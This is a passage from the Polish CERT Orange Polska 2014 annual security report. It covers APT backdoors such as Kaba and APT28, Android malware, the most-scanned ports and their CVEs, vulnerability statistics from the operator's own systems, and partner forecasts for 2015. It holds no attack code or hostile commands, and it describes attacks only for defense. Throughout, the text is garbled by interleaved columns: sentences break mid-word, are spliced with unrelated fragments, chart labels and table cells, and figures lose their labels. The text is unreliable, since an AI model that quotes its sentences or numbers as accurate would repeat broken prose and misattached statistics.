Polska: Android.NotCompatible. ści związane z atakami APT: Backdor.APT.Kaba, Backdor.APT.SpyNet oraz opubli- aplikacje od niepewnych dostawców lub spoza oficjal- kowała raport dotyczący grupy APT287, dla której celem ataku były między innymi nych sklepów, nie możemy być pewni, czy nie zawierają polskie organizacje rządowe. dodatkowych funkcji pozwalających na przejęcie kontroli Backdoor.APT.Kaba umożliwia zdalny dostęp do zainfekowanego komputera w trybie tekstowym oraz graficznym. Ataki są przeprowadzane przy użyciu zainfekowanych dokumentów, z wykorzystaniem „legalnych” komponentów oprogramowania Wykres 16. oraz technik pozwalających na uruchomienie właściwego złośliwego oprogramo- Zagrożenia dla urządzeń mobilnych wania bezpośrednio w pamięci komputera (w celu ominięcia klasycznych syste- z systemem Android – próbka mów bezpieczeństwa). Przeanalizowana próbka wykorzystuje podatność w pakie- Klaudiusz Korus trzymiesięczna cie Microsoft Office, aby uruchomić pozornie nieszkodliwy plik wykonywalny „ews. Starszy Inżynier Systemowy – FireEye exe”. Plik ten uruchamia komponent pakietu Office podatny na tzw. dll side loading Malware na urządzenia mobilne i w efekcie bibliotekę DLL, wykonującą właściwy kod złośliwego oprogramowania w sieci Orange Polska bezpośrednio w pamięci komputera. Początkowa faza ataku została przedstawiona 50% 44% 44% na rysunku na poprzedniej stronie. 45% Android.CoolPaperLeak 39% >> Rysunek 4. 40% Android.Malware.AndroRAT 36% 35% 35% Android.Trojan.CoinKrypt 29% 30% Więcej informacji dotyczących Backdor.APT.Kaba można znaleźć pod adresem: Android.NotCompatible 25% https://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx- 20% 17% 18% Android.Trojan.Mseg 16% 15% -kaba.html 9% 10% 8%

5% 1% 1% 1% 1% Należy podkreślić, że chociaż pierwsze wystąpienie APT.Kaba zostało odnotowane 0% wrzesień październik listopad w styczniu 2012 roku, grupa odpowiedzialna za ten atak jest wciąż aktywna! W paź- dzierniku 2014 roku FireEye opublikował raport APT28 opisujący działalność grupy cyberprzestępców popieranych najprawdopodobniej przez rząd rosyjski. W odróż- Rysunek 4. umieszcza wypakowuje nieniu od wspomnianych wcześniej ataków typu APT (Kaba, SpyNet) raport dotyczy ładunek tworzy Sposób działania działalności samej grupy przestępczej, stanowi zatem krok w kierunku fizycznego Backdoor.APT.Kaba zidentyfikowana przestępców, a nie tylko opisania technologii przez nich wykorzysty- ews.exe ładuje OCX rozpakowuje wanych. Grupa APT28 jest ukierunkowana na zbieranie informacji politycznych oraz ładuje rozszyfrowuje = DLL obronnych związanych z krajami Europy Zachodniej, Gruzją i Kaukazem. Działa co oinfop11.exe oinfo11.ocx oinfo11.iso najmniej od 2007 roku, ciągle udoskonalając i rozwijając swoje technologie. w tym samym katalogu w pamięci Więcej informacji dotyczących grupy APT28 znajduje się pod adresem: https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-rus- sias-cyber-espionage-operations.html, skąd można również pobrać pełny raport oraz wskaźniki pozwalające na zidentyfikowanie obecności grupy APT28 w sieciach firm i instytucji.

7 http://www.fireeye.com/resources/pdfs/apt28.pdf 30 31 Raport CERT Orange Polska za rok 2014

8. Skanowania portów i podatności

Przed przystąpieniem do ataku na sieci informatyczne Żeby się bronić przed aktywnym rekonesansem oraz agresor zazwyczaj zbiera informacje na temat atakowane- wykorzystaniem podatności należy: go celu. Ten proces można podzielić na dwa główne etapy: • dbać o aktualizację oprogramowania, pasywne i aktywne zbieranie informacji. Do tego drugiego • nie uruchamiać nadmiarowych (niepotrzebnych) usług etapu zalicza się między innymi skanowanie portów, które sieciowych, może świadczyć o próbach nieautoryzowanych połączeń • starannie konfigurować zapory sieciowe, udostępnia- w wyniku trwającego ataku lub o automatycznym działaniu ne usługi sieciowe oraz inne systemy bezpieczeństwa, złośliwego oprogramowania (infekcji). • wprowadzić Virtual Patching (blokowanie w systemach pośrednich: IPS (Intrusion Protection System)/ Skanując porty, agresor jest w stanie ustalić, jakiego rodza- HIPS (Host Intrusion Prevention System)/IDS (Intrusion ju usługi sieciowe są dostępne na atakowanym urządzeniu, Detection System), możliwości wykorzystania podat- jakie aplikacje oraz w jakich wersjach są udostępniane na ności) w przypadku, gdy aktualizacja oprogramowania otwartych portach, z jakich systemów operacyjnych korzy- nie usunie podatności. sta ofiara. Dobierając określone typy skanowania, może ponadto z dużym prawdopodobieństwem zidentyfikować Poniższe wyniki poparte dalszymi analizami ekspertów rodzaj wykorzystywanych firewalli oraz objęte nimi usługi. Orange Polska docelowo stanowią również przyczynek do Na podstawie zdobytych w ten sposób informacji agresor rozszerzenia listy blokowanych portów, zaś wyniki skanowa- Przed przystąpieniem do ataku tworzy mapę podatności występujących w wykorzystywa- nia podatności przyniosły bezpośredni efekt w postaci usu- nych u ofiary systemach operacyjnych oraz określa dal- nięcia potencjalnych zagrożeń w systemach Orange Polska. sze scenariusze ataku. Etap aktywnego rozpoznawania Orange Polska jako pierwszy operator wprowadził domyśl- infrastruktury jest zazwyczaj zapowiedzią realnych ataków ne blokowanie dostępu do portów nie wykorzystywanych na sieci informatyczne agresor na sieć informatyczną, dlatego tak istotne jest skuteczne przez użytkowników, a służących jako wektor ataku ze wykrywanie i utrudnianie bądź uniemożliwianie takich prób. względu na fakt, że według domyślnych ustawień systemu zazwyczaj zbiera informacje na pozostają one dostępne dla ruchu sieciowego. temat atakowanego celu. 8.1 Skanowania portów CERT Orange Polska uzyskał techniczną możliwość iden- • Port 1433 tyfikacji i analizy skanowań portów od czerwca 2014 roku. Używany standardowo przez MS SQL Server, popular- W analizowanym okresie (VI-XII ’14) najczęściej skanowa- ny system zarządzania bazami danych. W przeszłości nymi portami były: 8080, 5900, 10073 oraz 1433. był podatny na zdalne wykonanie kodu przez prze- Top 10 najczęściej skanowanych portów i ich zastosowanie: pełnienie bufora (CVE-2002-1123) oraz zablokowanie • Port 8080 pracy serwera przez atak DDoS (CVE-1999-0999). Jest używany przez wiele serwerów web proxy oraz Najwięcej ataków na port 1433 przeprowadzano aplikacji, m.in. Syncthing GUI, M2MLogger lub serwer z Chin, Stanów Zjednoczonych, Republiki Korei Połu- Apache Tomcat. dniowej oraz Wietnamu. • Port 5900 • Port 81 Używany przez Virtual Network Computing (VNC), opro- Używany bezpośrednio przez część instancji malware. gramowanie umożliwiające zdalny dostęp do komputera. • Porty 21320, 10073 Wiele jego wersji jest podatnych na ominięcie uwierzy- Nieobsługiwane przez żadne dedykowane oprogra- telnienia i uzyskanie zdalnego dostępu bez znajomości mowanie, prawdopodobnie używane do realizacji jed- hasła, z tego powodu cyberprzestępca może przejąć nego z backdoorów. kontrolę nad zaatakowanym urządzeniem. • Port 110 Protokół POP3 używany do odbioru poczty elektro- RealVNC 4.1.1 – CVE-2006-2369 nicznej. UltraVNC 1.0.1 – CVE-2006-1652 identyfikatory podatności UltraVNC 1.0.2 – CVE-2008-5001, CVE-2009-0388 Vino VNC Server – CVE-2013-5745

33 Raport CERT Orange Polska za rok 2014

• Port 3128 skanowanych portów jest wykorzystywana przez atakują- 8.2 Podatności Używany przez aplikację Squid serwer pośredniczący cych przede wszystkim do skompromitowania urządzeń (Proxy). Podatny na dwa typy ataków: zablokowania poprzez wykorzystanie niezaktualizowanych aplikacji, sko- usługi spreparowanymi nagłówkami http oraz umoż- rzystania z funkcjonalności aplikacji w celu skkompromito- Dzięki podatnościom w usługach bądź systemach ope- php, asp etc. Wśród nich mogą się znaleźć np. pliki liwienie wykonania kodu przez przepełnienie bufora. wania kolejnych urządzeń lub zarządzania już skompromi- racyjnych atakujący są w stanie przejąć dany serwis albo konfiguracyjne przechowujące hasła do baz danych, Celem ataku może być też wykorzystanie otwartych towanymi. nawet cały serwer, na którym funkcjonuje usługa. Jednym itd. serwerów proxy do dalszych ataków, co utrudnia z najbardziej destrukcyjnych ataków wykorzystujących • Arbitrary File Download (AFD) – częsty błąd w mecha- wykrycie sprawcy. Poniżej lista krajów, z których przeprowadzono największą podatności jest atak wymierzony bezpośrednio w syste- nizmach pobierania plików. Pozwala na pobranie • Port 8088 liczbę skanowań portów. Tabela powstała w wyniku ana- my operacyjne. Często udostępniają one różnego rodzaju dowolnego (w ramach uprawnień) pliku za pomocą Używany przez Asterisk Web Configuration (PBX), lizy przez CERT Orange Polska adresów IP źródeł skano- usługi sieciowe lub lokalne, dając atakującemu, po przeję- odpowiedniej manipulacji ścieżkami. Często też umoż- webowy interfejs służący do zarządzania centralą VoIP. wania. Największa liczba skanowań pochodzi z adresów ciu kontroli nad usługą, pełną swobodę pracy. liwia pobranie plików, np. php, co może prowadzić do W wielu wersjach system ma liczne błędy umożliwia- źródłowych z lokalizacją w Stanach Zjednoczonych. Dla przejęcia serwisu WWW. jące zdalne przejęcie kontroli, ominięcie autoryzacji skanowań prowadzonych z adresacji IP tego kraju zaob- Do najczęstszych ataków zaobserwowanych przez CERT • Inne błędy logiczne – do częstych przykładów błędów i uwierzytelnienia użytkownika, a także przeprowadze- serwowano również najszerszy zakres badanych portów. Orange Polska należą: logicznych należy np. niesprawdzanie rozszerzenia nie ataku Denial of Service na centralkę VoIP. >> Tabela 1. • SQL Injection – wstrzyknięcie zapytania SQL umożli- podczas uploadu plików. Błąd ten może prowadzić do • Port 113 wiającego np. podejrzenie loginów i haseł, zrzut bazy załadowania pliku php i wykonania dowolnego kodu. Używany do uwierzytelniania przez różnego rodzaju Tak szeroki zakres prowadzonego rozpoznania może danych do pliku, usunięcie tabel lub przeczytanie pli- W poniższym zestawieniu znajdują się statystyki podatno- serwery IRC. świadczyć o poszukiwaniu tylnych furtek dla systemów ków ści dotyczące aplikacji webowych oraz systemów opera- i aplikacji nasłuchujących na niestandardowych portach • Cross-Site Scripting (XSS) – manipulacja zawartością cyjnych zaobserwowane przez zespół CERT Orange Pol- Fakt największej popularności usługi proxy wynika lub budowania mapy dostępnych usług. Mniejsza liczba strony dzięki wstrzykniętemu kodowi działającemu ska za pomocą Systemu Wykrywania Podatności (SWP). w znacznej części z tego, że umożliwia ona atakującemu unikalnych skanowanych portów z adresacji IP innych kra- w przeglądarce internetowej klienta. Efektem może być SWP to zintegrowane rozproszone systemy identyfikacji wykorzystanie komputera nieświadomej ofiary do połącze- jów może być dowodem na poszukiwanie przez skanują- utrata danych, eskalacja uprawnień, atak na inne apli- i zarządzania podatnościami, które cyklicznie monitorują nia z kolejnym serwerem, a w efekcie do przeprowadze- cych konkretnych podatnych usług. kacje. XSS to kradzież „ciasteczka” sesyjnego, robaki, wybrane segmenty sieci oraz aplikacje www. Po każdym nia bardziej anonimowego ataku docelowego. Większość infekujące serwisy społecznościowe lub wstrzykujące z takich cykli generowane są raporty informujące o stanie „pod” faktyczną witrynę niewidoczne ramki wykonu- bezpieczeństwa monitorowanych systemów, przesyłane jące akcje bez wiedzy użytkownika, np. pobierające następnie automatycznie do osób odpowiedzialnych za złośliwe oprogramowanie. utrzymanie systemów. • CSRF (Cross Site Request Forgery) – pozwala wyko- Pozycja Kraj Liczba unikalnych portów rzystać sesję użytkownika do nieświadomego prze- CERT Orange Polska wykrył w objętych analizą na potrze- 1 Stany Zjednoczone 922 syłania żądań do aplikacji interpretującej te żądania by niniejszego raportu przygotowanych do wdrożenia w kontekście sesji użytkownika jako poprawne. Ataki zasobach WWW należących do Orange Polska 181 uni- 2 Tajwan 141 CSRF prowadzą do eskalacji uprawnień, zmiany bądź kalnych podatności o różnych poziomach krytyczności: 3 Holandia 527 ujawnienia danych (w tym uwierzytelniających). Naj- • „informacyjne” – ujawniają np. ścieżki dostępu do pli- 4 Chiny 478 częściej powiązane są z siecią www i protokołem http, ków, dane dotyczące wersji i typu wykorzystywanego 5 Polska 122 znane są też przypadki występowania tej podatności oprogramowania, np. w serwerze ftpd (CVE-2008-4247). Wymagana • „niskie” – minimalny bezpośredni wpływ na bezpie- 6 Rosja 146 jest znajomość struktury atakowanej aplikacji. czeństwo aplikacji lub systemu, mogą dotyczyć braku 7 Francja 130 • Insecure Direct Object References – bezpośredni szyfrowania danych lub słabości w wykorzystywanych 8 Szwecja 21 dostęp do chronionych danych poprzez manipulowa- algorytmach kryptograficznych, nie parametrami żądań http. • „średnie” – mogą prowadzić do całkowitego przełama- 9 Singapur 12 • Remote File Include (RFI) – zdalne zaimportowanie nia zabezpieczeń systemu przy spełnieniu określonych 10 Korea Południowa 311 i wykonanie kodu (np. PHP) wykonywanego przez warunków (np. zdalne wykonanie polecenia w systemie operacyjnym, gdy użytkownik zostanie poprawnie Tabela 1. Kraje, z których wykryto największą liczbę skanowanych unikalnych portów (pozycje wg. liczby skanowań) atakującego w ramach podatnej strony, następnie zaś wykorzystanie luki, by wykonać ten kod po stronie autoryzowany w aplikacji), serwisu atakowanego. Wykorzystywane najczęściej • „wysokie” – mają bezpośredni i natychmiastowy w celu uzyskania dostępu do danych chronionych. wpływ na bezpieczeństwo systemu bądź aplikacji bez • Local File Include (LFI) – podpatrzenie plików na serwe- konieczności spełniania dodatkowych warunków. rze w zależności od narzuconych uprawnień. Pozwala >> Wykres 17. często również na odczytanie plików z rozszerzeniami

34 35 Raport CERT Orange Polska za rok 2014

Wykres 17. Kolejny wykres przedstawia liczbę unikalnych podatności W przypadku systemów z rodziny Windows błędy wystę- 8 9% Podatności w badanych aplika- w badanych aplikacjach WWW wprowadzanych do wdro- pują przeważnie w niezabezpieczonych usługach: SMB , 18% 9 10 11 cjach WWW w podziale na poziom żenia w podziale na miesiące, w których wystąpiły. W ubie- RPC , LSASS , UPnP . Większość z nich umożliwia swo- głym roku średnia miesięczna liczba podatności wykrytych bodny dostęp do podatnego urządzenia, po odpowied- wysokie krytyczności w aplikacjach objętych analizą na potrzeby raportu przy nim wykorzystaniu luki w oprogramowaniu. Zazwyczaj średnie użyciu SWP oscylowała w okolicy 70. wystarczyłoby odpowiednio dbać o utrzymanie systemów, niskie >> Wykres 18. by znacznie zminimalizować ryzyko udanego ataku. Dzię- ki prowadzonym cyklicznie przez CERT Orange Polska 34% 39% informacyjne Liczba występujących podatności nie ma stałej tendencji testom bezpieczeństwa infrastruktury i aplikacji rekomen- spadkowej ani wzrostowej. Powodem jest m.in. wprowa- dacje bezpieczeństwa wdrażane przez utrzymujących sys- dzanie ciągłych zmian w monitorowanych środowiskach temy i aplikacje zmniejszają możliwość przejęcia kontroli przez takie czynniki jak prace developerskie, zmiana funk- nad systemami lub wycieku informacji. cjonalności oraz poziom wiedzy na temat bezpieczeństwa Wykres 18. poszczególnych deweloperów i administratorów. W zestawieniu na poprzedniej stronie znajdują się staty- Liczba unikalnych podatności styki dotyczące podatności zidentyfikowanych w anali- 80 aplikacjach WWW wprowadzanych Poniżej lista Top 10 podatności obserwowanych na obję- zowanych przez zespół CERT Orange Polska systemach 70 do wdrożenia w skali danego tych analizą serwerach webowych: operacyjnych. 60 miesiąca. >> Tabela 2. >> Wykres 19. 50

40 Poniższa tabela przedstawia listę 10 najczęściej występu-

30 jących podatności z kategorii ryzyka „wysokie”.

20 >> Tabela 3.

0 Podatność Liczba Procent w stosunku nik luty maj do wszystkich podatności lipiec marzec styczeń sierpień listopad grudzień kwiecień wrzesień czerwiec Directory Listing 6474 21% paździer Possible temporary file/directory 3822 12% Application error message 1295 4% Wykres 19. Cross site scripting 1221 4% Podatności wykryte w systemach operacyjnych w podziale na po- Email address found 1132 3% 36% 25% wysokie ziom krytyczności Session Cookie without Secure flag set 1006 3% średnie Password type input with auto-complete enabled 791 2% niskie Unicode transformation issues 758 2%

informacyjne Tabela 2. Podatności (w tym informacyjne) występujące najczęściej w serwerach web przygotowanych do wdrożenia produkcyjnego 32% 7% Podatność Liczba Cross-Site Scripting 1221 Unicode transformation issues 758 Wykres 20. SVN repository found 605 700 Liczba unikalnych podatności Poodle 277 600 w systemach operacyjnych w podziale na miesiące Slow HTTP Denial of Service attack 180 500 CRIME SSL/TLS (attack) 134 400 jQuery cross-site scripting 86 300 Vulnerable Javascript library 83 200 Microsoft IIS tilde directory enumeration 43 100 Backup files 20 0 nik luty maj

lipiec Tabela 3. Najczęściej występujące podatności, mogące generować poważne zagrożenia dla serwerów webowych marzec styczeń sierpień listopad grudzień kwiecień wrzesień czerwiec paździer

8 Protokół udostępniania zasobów (dysków, folderów, plików) w sieci 9 Protokół zdalnego wywołania procedur w komunikacji między komputerami 36 10 Podsystem odpowiedzialny za politykę bezpieczeństwa w MS Windows 37 11 Protokół wykorzystywany m.in. do autokonfiguracji przez sieć Raport CERT Orange Polska za rok 2014

Największą liczbę luk bezpieczeństwa w analizowanych Systemy operacyjne, na których wykryto najwięcej unikal- Podatność Liczba wystąpień Procent w stosunku systemach operacyjnych zaobserwowano w miesiącach nych podatności, to: do wszystkich podatności marzec-kwiecień 2014 roku. W marcu zidentyfikowano • Windows Server 2003 (Service Pack 2) – 201 unikal- Web Server HTTP Protocol Version Detected 6492 23% 429 unikalnych podatności, natomiast w kwietniu – 594. nych podatności, To znaczący wzrost w porównaniu do stycznia, gdy licz- • Linux 2.6.x – 193 unikalne podatności, Hidden WWW Server Name Detected 4102 14% ba ta wynosiła zaledwie 13. Jest to związane z premie- • Windows XP – 110 unikalnych podatności. HTTP Server Prone To Slow Denial Of Service Attack 3032 11% rami nowych wersji oprogramowania (w tych miesiącach McAfee Common Management Agent Detected 3010 10% ponad 80 procent to podatności z kategorii „informacyj- Tabela 6 pokazuje zestawienie systemów operacyjnych ne”). Wykres 20 przedstawia liczbę wykrytych unikalnych z unikalną liczbą wykrytych podatności. Web Server Self-Signed TLS/SSL X.509 Certificate 1112 4% podatności w podziale na miesiące, w których zostały >> Tabela 6. SSL Certificate Short Public Key 1102 4% zidentyfikowane. Web Server Supports Weak SSL Encryption Certificates 1093 4% >> Wykres 20. W wyniku analizy podatnych systemów operacyjnych 12 Web Server Redirection Detected 628 2% i porównania z danymi ze świata za rok 2014 nasuwają Pomimo tak nagłego wzrostu liczby podatności w następ- się następujące wnioski: IETF X.509 Certificate Signature Collision Vulnerability 401 1% nych miesiącach widoczny jest ich spadek – w grudniu • podatności w systemach Windows Server 2003 sta- VNC HTTP Console 331 1% 2014 roku do 117 unikalnych podatności. Spadek liczby nowią 31 procent wszystkich podatności, zidentyfikowanych podatności wynika z mechanizmów • podatności w systemach Windows XP stanowią Tabela 4. Podatności (w tym informacyjne) występujące najczęściej w systemach operacyjnych zarządzania ryzykiem stosowanych w Orange Polska. 15 procent wszystkich podatności, Osoby odpowiedzialne za utrzymanie systemów są na • podatności w systemach Linux stanowią 12 procent bieżąco informowane o stanie bezpieczeństwa. Ponadto wszystkich podatności. Podatność Liczba wystąpień niezależnie od działania systemu SWP w organizacji wdro- Powyższe nie powinno dziwić z uwagi na fakt, że Windows żone są procesy i polityki mające na celu ciągłą poprawę XP nie jest już objęty pełnym supportem producenta, a okres JBoss EJBInvokerServlet / JMXInvokerServlet Marshalled Object Remote Code Execution 134 stanu bezpieczeństwa. Wzrost liczby podatności z grud- wsparcia dla Windows 2003 zakończy się w bieżącym roku. Cisco IP Phone Information Disclosure 78 nia w stosunku do poprzednich miesięcy wynika między Proces migracji do nowszych wersji systemów potrwa jesz- HP System Management Homepage ginkgosnmp.inc Security Bypass 75 innymi z faktu, że jest to miesiąc, w którym wstrzymuje się cze zapewne jakiś czas, co sprzyja atakującym, chcącym Apache httpd Ranges Header Field Memory Exhaustion 49 wiele prac migracyjnych i utrzymaniowych, ograniczając je wykorzystać znane, publikowane i wciąż niezabezpieczone do niezbędnego minimum z uwagi na przygotowanie do podatności tych systemów. Dlatego bardzo istotne jest sto- PHP sqlite_udf_decode_binary() Buffer Overflow Vulnerability 49 zamknięcia roku. Wpływa to na możliwość prowadzenia sowanie ochrony metodą „Defense-in-Depth”, czyli wielo- PHP imap_mail_compose() Stack Buffer Overflow Vulnerability 41 zmian w monitorowanej infrastrukturze. warstwowego zabezpieczenia zasobów znacznie utrudnia- PHP sqlite_udf_decode_binary() Buffer Overflow Vulnerability (CVE-2007-1887) 39 Wykres 21 przedstawia liczbę wystąpień podatności jącego przeprowadzenie skutecznego ataku. w podziale na poziom krytyczności. Apache HTTP Server mod_proxy Reverse Proxy Denial of Service Vulnerability 35 >> Wykres 21. Relatywnie wysoka liczba podatności występujących (VMSA-2013-0014) VMware ESX/ESXi LGTOSYNC.SYS Driver Privilege Escalation Vulnerability 20 w systemach Linux wynika z faktu występowania wielu (HPSBMU02947) HP System Management Homepage Multiple Vulnerabilities Prior To 7.3 19 Tabela na poprzedniej stronie przedstawia dziesięć najczę- dystrybucji tej rodziny systemów i ujmowania ich w staty- ściej wykrywanych podatności. Większość z nich należy stykach jako jednej grupy. Dla części z nich dostępne jest Tabela 5. Najczęściej występujące w systemach operacyjnych podatności z kategorii wysokie do kategorii „informacyjne”. wysokopoziomowe wsparcie, natomiast bezpieczeństwo >> Tabela 4. innych zależy głównie od kompetencji i świadomości zagro- żeń administratorów nimi zarządzających. Najczęstszymi System Operacyjny Unikalna liczba podatności w Orange Polska Tabela 5 to Top 10 podatności systemów operacyjnych metodami ataków wykorzystujących podatności, a skiero- z kategorii „wysokie”: wanych w systemy operacyjne i ich usługi, są ataki słowni- Windows Server 2003 (Service Pack 2) 117 >> Tabela 5. kowe na mechanizmy uwierzytelnienia, przede wszystkim Linux 2.6.x 108 na takie usługi jak: Telnet, RDP, VNC oraz SSH. Windows XP 96

Linux 2.6.18 68 250 Wykres 21. Windows XP (Version 5.1, Service Pack 3, Build 2600, Professional) 49 200 Liczba wystąpień podatności Windows 7 Professional (Service Pack 1) 32 w podziale na poziom krytyczności średnie 150 Linux 2.4.x 26 niskie Cisco IOS 8 100 informacyjne

Windows 7 (Service Pack 1) 7 50 wysokie

Tabela 6. Systemy operacyjne z największą liczbą unikalnych podatności 0 nik luty maj lipiec marzec styczeń sierpień listopad grudzień kwiecień wrzesień czerwiec paździer

38 39 Raport CERT Orange Polska za rok 2014

9. Cyber-świat 2015 Wiele krytycznych i popularnych aplikacji: Microsoft Internet Explorer, Adobe Reader czy Google Chrome ma zaimplementowane mechanizmy sandboxingu. Ponieważ oczami partnerów Orange Polska te mechanizmy w skuteczny sposób eliminują wiele próbek złośliwego oprogramowania, twórcy malware będą szukać nowych ścieżek dotarcia do swoich ofiar. Podatności, które ułatwiały obejście inspekcji sandboxa, zostały wykryte w wielu aplikacjach, zaś w McAfee Labs zaobserwowano techniki wykrywania słabości po- zwalających uciec przed inspekcją sandbox. To tylko kwestia czasu, by zostały one udostępnione szeroko na „rynku producentów malware”. Rok 2015 będzie kolejnym, w którym zaobserwujemy wzrost zjawiska cyberszpiego- stwa. Niektóre państwa oraz grupy terrorystyczne wykorzystają cyberprzestrzeń do walki ze swoimi wrogami. Będą to czyniły poprzez ataki DoS lub przy wykorzy staniu zaawansowanego malware. Jednocześnie w tym czasie cyberszpiedzy staną się bardziej niewidoczni dzięki udoskonalonym metodom ukrywania swojej obecno- ści w sieci ofiar, przez co staną się jeszcze bardziej groźni. McAfee Labs obserwu- je interesujące zjawisko dotyczące aktywności pochodzącej z Europy Wschodniej. Atakujący stają się coraz bardziej cierpliwi, co oznacza, że odchodzą od modelu W minionym roku badacze z FortiGuard Labs znaleźli oprogramowanie Dorkbot/ ataku i ucieczki, koncertując się na byciu niewidocznym w oczekiwaniu na dogodny NGRbot wyposażone w procedury, które w przypadku modyfikacji kodu powodo- moment do wykorzystania/sprzedaży pozyskanych danych. wały samozniszczenie intruza i jednoczesne usunięcie wszystkich danych z dysku Rok 2015 przyniesie ogromny przyrost inteligentnych urządzeń podłączonych do twardego. Jest to wyraźnie bezpośrednia odpowiedź na coraz większą popular- sieci (Internet of Things) – nie tylko tych tworzących Inteligentny Dom! Po stronie ność usług reagowania na sytuacje naruszenia bezpieczeństwa. biznesu mamy do czynienia z urządzeniami wykorzystywanymi przy produkcji oraz aparaturę medyczną. Zakres oprogramowania i złożoność towarzyszące temu zja- Fortinet przewiduje, że autorzy ataków typu APT będą opracowywali mechanizmy wisku nie sprzyją bezpieczeństwu w tym zakresie. Ataki na urządzenia IoT staną się samozniszczenia działające na zasadzie „wyszukaj i zniszcz”, co poważnie utrudni bardziej powszechne od ataków na kamery IP, systemy SCADA czy wkraczające do pracę organom ścigania. Cyberprzestępcy mogą również wykorzystywać tę takty- Polski inteligentne liczniki energii elektrycznej. kę do wymuszania okupu, na przykład grożąc, że w przypadku nieprzelania okre- ślonej kwoty na podane konto firma straci wszystkie swoje dane. McAfee. Sebastian Zamora Dlatego według McAfee Labs można się spodziewać dużego ataku związanego bez- pośrednio z internetem rzeczy. Coraz częściej celem będą systemy mobilne, przede Channel Account Manager Ponieważ organy ścigania coraz częściej łapią cyberprzestępców i doprowadzają wszystkim dla ataków typu ransomware, wymuszających okup za zwrócenie użyt- ich do sądu, powstaną nowe, zaawansowane techniki unikania wykrycia. Działania kownikowi dostępu do przechowywanych na tych urządzeniach coraz istotniejszych danych. Rok 2015 będzie polem walki pomiędzy specjalistami wykrywającymi i eli- na tym polu będą skoncentrowane na unikaniu wydzielonych środowisk urucha- minującymi podatności systemów płatności mobilnych a atakującymi starającymi się miania aplikacji (ang. sandboxes), a także kierowaniu podejrzeń na niewinne osoby wykorzystać te podatności. McAfee Labs przewiduje nasiloną dyskusję wokół tematu dzięki zostawianiu fałszywych śladów. Cyberprzestępcy (crackerzy) będą atakować Internet Rzeczy – systemy automatyzacji domowej i zabezpieczania prywatnych prywatności, szczególnie w zakresie definicji pojęcia danych osobowych. Unia Eu- Fortinet. Derek Manky domów i mieszkań (alarmy, monitoring), a także kamery internetowe. W niebezpie- ropejska skupi się na regulacjach dotyczących ochrony danych, a w efekcie także Specjalista ds. Globalnych Strategii czeństwie znajdą się newralgiczne elementy infrastruktury takie jak interfejsy czło- ograniczania anonimowości użytkowników sieci, którzy będą popularyzować metody Bezpieczeństwa obchodzenia tych ograniczeń. Każdy aspekt regulacji Unii w tym zakresie będzie miał wiek-maszyna (Human Machine Interface, HMI) czy systemy przemysłowe (SCA- w mniejszym lub większym stopniu wpływ na państwa narodowe i organizacje bizne- DA). Najczęściej rozpowszechniane i sprzedawane szkodliwe oprogramowanie sowe w Unii. będzie wyposażone w funkcje pozyskiwania danych i nadzoru.

Należy się spodziewać ekstremalnych przyrostów ataków kierowanych na systemy Rok 2014 nazywany jest „rokiem kradzieży danych”, Wystarczy wspomnieć choć- niewindowsowe. W drugiej połowie 2014 roku świat dowiedział się o luce Shellshock, by głośne włamania do sklepów Target, Michaels, P.F. Chang’s czy Home Depot. podatności Bash w systemach Unix, Linux, OS X. Podatność ta pozwala atakujące- Specjaliści FortiGuard Labs przewidują, że w 2015 roku ta tendencja się utrzyma, mu na wykonanie dowolnej komendy na urządzeniu ofiary, co czyni tę podatność crackerzy będą wykorzystywać bardziej zaawansowane techniki i znajdą nowe luki jedną z najgroźniejszych. Wiele urządzeń działa na bazie jakiejś formy Linuxa czy w zabezpieczeniach systemów sklepów oraz instytucji finansowych. Unixa (sterowniki przemysłowe, systemy lotnicze, telewizory). Dopiero zaczynamy Serwisy przestępcze już teraz oferują usługi kontroli jakości szkodliwego oprogra- rozumieć naturę tej luki. Ataki będą skierowane na zaistnienie w infrastrukturze ofiary: mowania. W 2015 roku ich wachlarz zostanie rozszerzony o unikanie wykrycia przez od użytkowników domowych poprzez przedsiębiorstwa zależne od urządzeń bazu- zaawansowane systemy bezpieczeństwa i wymykające się wykryciu wskaźniki IoC jących na podatnych systemach. Cyberprzestępcy będą chcieli spieniężyć inwesty- (ang. Indicator of Compromise). W miarę rozbudowywania możliwości badawczych cję we właściwym czasie, żądając okupu czy sprzedając wrażliwe dane. Zamknięcie i usług oferowanych przez serwisy przestępcze crackerzy będą wykorzystywać jednych luk spowoduje penetrację systemów i wykrycie nowych przez atakujących. tego samego rodzaju procesy w celu ustalania najlepszych sposobów na ominię- cie zabezpieczeń. Przestępcy skupią się także na analizie infrastruktury botnetowej McAfee Labs przeanalizowało próbki malware dostępne w swoim laboratorium pod kątem wykrywalności przez rozwiązania różnych dostawców. w celu zbadania, jak często malware jest w stanie wykorzystać znane podatności aplikacji. W zależności od kwartału od 1 do 6 procent próbek wykorzystało znaną lukę. W 2015 roku McAfee Labs przewiduje wzrost nowo wykrytych luk bezpieczeństwa w aplikacjach oraz wzrost złośliwego oprogramowania wykorzystującego nowe luki.

41 Raport CERT Orange Polska za rok 2014

W 2014 roku poznaliśmy siłę prawdziwych wolumetrycznych ataków DDoS (takich Nie wszystkie powyższe zagrożenia były jednocześnie wskazywane jako przynoszące najbardziej dokuczliwe i naj- o sile powyżej 10 Gbps) i ten trend będzie narastał. Już atak o sile przekraczającej groźniejsze konsekwencje. W tej kategorii wartość powyżej 4,0 osiągnęły pozycje związane z atakami na infrastruk- 1 Gbps może stać się problemem nawet dla dużej firmy, a nawet dla dostawcy inter- turę krytyczną bądź na dane wrażliwe: netu. Tymczasem ataki przekraczające 20, czy 50 Gbps nie są rzadkością i to trzeba • cyberkonflikty między państwami powiązane z atakami dedykowanymi – 4,5, sobie uświadomić, bo sytuacja będzie się pogarszać. • ataki na systemy sterowania przemysłowego (SCADA) – 4,33, Przez ostatnie lata pokazywano nam przykłady ataków, które mogą przełożyć się • wycieki baz danych zawierających dane osobowe – 4,13, bezpośrednio na ofiary w ludziach – na rozruszniki serca, pociągi, samochody, czy • ataki ukierunkowane na organizacje (APT) – 4,13, nawet samoloty. W mojej opinii pytanie powinno brzmieć nie „czy”, ale „kiedy” to się • ataki na urządzenia medyczne – 4,05. stanie. Podobnie powinno brzmieć pytanie o kolejne coraz bardziej efektywne ataki na infrastrukturę krytyczną: sieci przesyłowe prądu, wody, telefoniczne, telewizyjne, Najbardziej spektakularne wydarzenia 2014 roku – Dragonfly, BlackEnergy, Sandworm, APT28, atak na Sony – pobu- a nawet komunikację policji i straży pożarnej. Najbardziej 